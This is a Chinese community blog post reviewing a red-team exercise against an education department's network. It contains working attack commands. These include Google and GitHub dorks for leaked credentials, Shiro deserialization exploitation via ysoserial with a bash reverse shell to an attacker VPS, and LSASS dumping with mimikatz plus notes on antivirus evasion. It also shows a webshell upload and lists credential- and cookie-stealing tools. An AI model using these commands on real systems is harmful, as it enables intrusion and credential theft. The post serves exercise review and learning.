攻防演练-记一次某市级教育厅HW复盘总结

举报
亿人安全 发表于 2023/05/27 14:44:46 2023/05/27
【摘要】 前言正如今年的高考题目,学习应从本手开始,把基础打好,才能在实战中打出妙手操作,如果眼高手低,往往会落到俗手的下场这次攻防演练每个队伍分配不同的目标,有些队伍拿的点可以直接 nday 打,有些队伍外网打点十分困难比如我们,但分数是是统一算的,可以说不是那么的公平不过也算是提供了些许经验,简单做一下总结,都是比较基础的东西,如有写的不正确的地方欢迎各位师傅指正外网打点敏感信息泄露一般来说学校外...

前言

正如今年的高考题目,学习应从本手开始,把基础打好,才能在实战中打出妙手操作,如果眼高手低,往往会落到俗手的下场

这次攻防演练每个队伍分配不同的目标,有些队伍拿的点可以直接 nday 打,有些队伍外网打点十分困难比如我们,但分数是是统一算的,可以说不是那么的公平

不过也算是提供了些许经验,简单做一下总结,都是比较基础的东西,如有写的不正确的地方欢迎各位师傅指正

外网打点

敏感信息泄露

一般来说学校外网能拿直接权限的点已经很少了,web 应用大多是放在 vpn 后面,因此能弄到一个 vpn 账号可以说是事半功倍

另外还可以通过语法筛选出存在默认弱口令的系统,常用命令如下:

PLAINTEXT

1
2
3
4
5
6
7
#google语法
site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码

#github
*.edu.cn password

查看方式优先选择最近更新,太久远的基本上失效了

image-20220603202646224

image-20220603202550638

这里队友收集到了某个目标的 vpn 账号,使用的是 姓名拼音/12345678 弱口令

image-20220606103433983

进去内网后能访问的只有一个 OA 系统,测试了一下没发现什么东西,寻找其他突破口

shiro 无链

常规的打点可通过 fofa、hunter、quake 等网络测绘平台进行资产收集,收集好后进行去重,把去重后的资产列表进行批量指纹识别,筛选出重要易打点的系统

在常规的 hw 中这些方法比较通用,但是对于教育行业来说会相对困难,有 edusrc 的存在许多通用型漏洞已经被提交修复了,因此在信息搜集的时候要多去寻找旁站和一些容易被遗漏的站点

坐了一天牢后,终于通过测绘平台找到一个比较偏的资产,直接访问是一个静态页面,但扫描目录后指纹识别一波发现是 shiro

直接工具开冲,发现有默认 key 但是无利用链

image-20220607141636636

这里想到之前学习 shiro 可以无依赖利用,感觉有戏尝试一波,相关知识可学习此文章 https://www.le1a.com/posts/a5f4a9e3/

PLAINTEXT

1
2
java -jar shiro_tool.jar 地址
VPS:端口

image-20220607115446156

通过 dnslog 测试有回显,这里有个注意点:使用 http://dnslog.cn/ 部分站点会拦截,可以换多个 dnslog 平台测试

image-20220607142816460

dnslog 有回显接下来就是拿 shell 了,这里由于固化思维,之前遇到的都是 linux 系统,先入为主觉得是 Linux,结果没利用成功

这里可以通过网站快速生成 payload,https://x.hacking8.com/java-runtime.html

一开始以为是防火墙拦截,后面队友探测了一下目录结构,发现是 windows,所以这里 payload 要改变一下

Linux:

PLAINTEXT

1
2
3
java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils1 "bash -c {echo,字段}|{base64,-d}|{bash,-i}"
字段=bash -i >& /dev/tcp/x.x.x.x/8888 0>&1 base64后的值
nc -lvp 端口

Windows:

PLAINTEXT

1
2
3
java -jar JNDIExploit-1.0-SNAPSHOT.jar -i VPS地址
java -cp ysoserial-0.0.6-SNAPSHOT-1.8.3.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils2 "ldap://VPS地址:1389/Basic/Command/Base64/d2hvYW1p"
d2hvYW1p为命令的base64,这里是执行命令whoami

内网横向

上线 cs

dump lssas

这里看到是 08 机器直接抓一波密码,但这里密码是空口令,不然可以通过密码复用撞一波

如果碰到有杀软的情况,可以 dump lssas 出来本地进行读取,之前测试过一波 lolbins,但大多已经不免杀了,这里提供一种方法

dump64.exe

PLAINTEXT

1
dump64.exe <pid> c:\users\out.dmp

卡巴斯基拦截,火绒和 360 不拦截

image-20220501025143169

image-20220501025521687

dump 出来后通过 mimikatz 或者其他方式进行读取

PLAINTEXT

1
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

image-20220607155337510

接着可以通过 netspy 筛选可达的网段(之前用的时候没注意,才发现是天威战队大哥的工具 = =)

https://github.com/shmilylty/netspy

image-20220608115039040

但这里 192、172、10 段的资产比较少,这些段主要是一些网络设备如摄像头、网关设备,拿到的仅有 web 弱口令

大华 admin/admin

image-20220608120319920

锐捷 admin/admin

image-20220608120458573

突破隔离

主站的 c 段大多是不通的,猜测是做了隔离限制,因此开始考虑如何去突破隔离,这里尝试通过后台寻找一些任意文件上传的点看能否拿下一些机器

这里比较幸运,找到一个实验平台弱口令登录进去,找到一个新增模板导入模块,修改后缀 xls 为 aspx 拿到一个 shell

image-20220608122226881

image-20220608174812800

并且这个机器可以访问和到达教务网段,突破了隔离限制,通过 111.25.x.0/24 段服务器信息收集、漏洞利用,抓密码撞密码时间,最终获取 211.112.x.0/24 段多个服务器权限 (c 段为虚拟数据),下面列举一些例子

漏洞利用

redis

image-20220609090837228

shiro

image-20220609090225321

struts2

image-20220609090456630

抓密码

拿到一台机器可以根据机器上安装的软件进行对应的密码读取,如 navicat、xshell 等

https://github.com/JDArmy/SharpXDecrypt

https://github.com/RowTeam/SharpDecryptPwd

sqlserver

image-20220608180214309

mysql

image-20220609090704944

浏览器

HackBrowserData](https://github.com/moonD4rk/HackBrowserData)

SharpWeb](https://github.com/djhohnstein/SharpWeb)

SharpDPAPI](https://github.com/GhostPack/SharpDPAPI)

360SafeBrowsergetpass](https://github.com/hayasec/360SafeBrowsergetpass)

BrowserGhost](https://github.com/QAX-A-Team/BrowserGhost/)

Browser-cookie-steal (窃取浏览器 cookie)](https://github.com/DeEpinGh0st/Browser-cookie-steal)

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。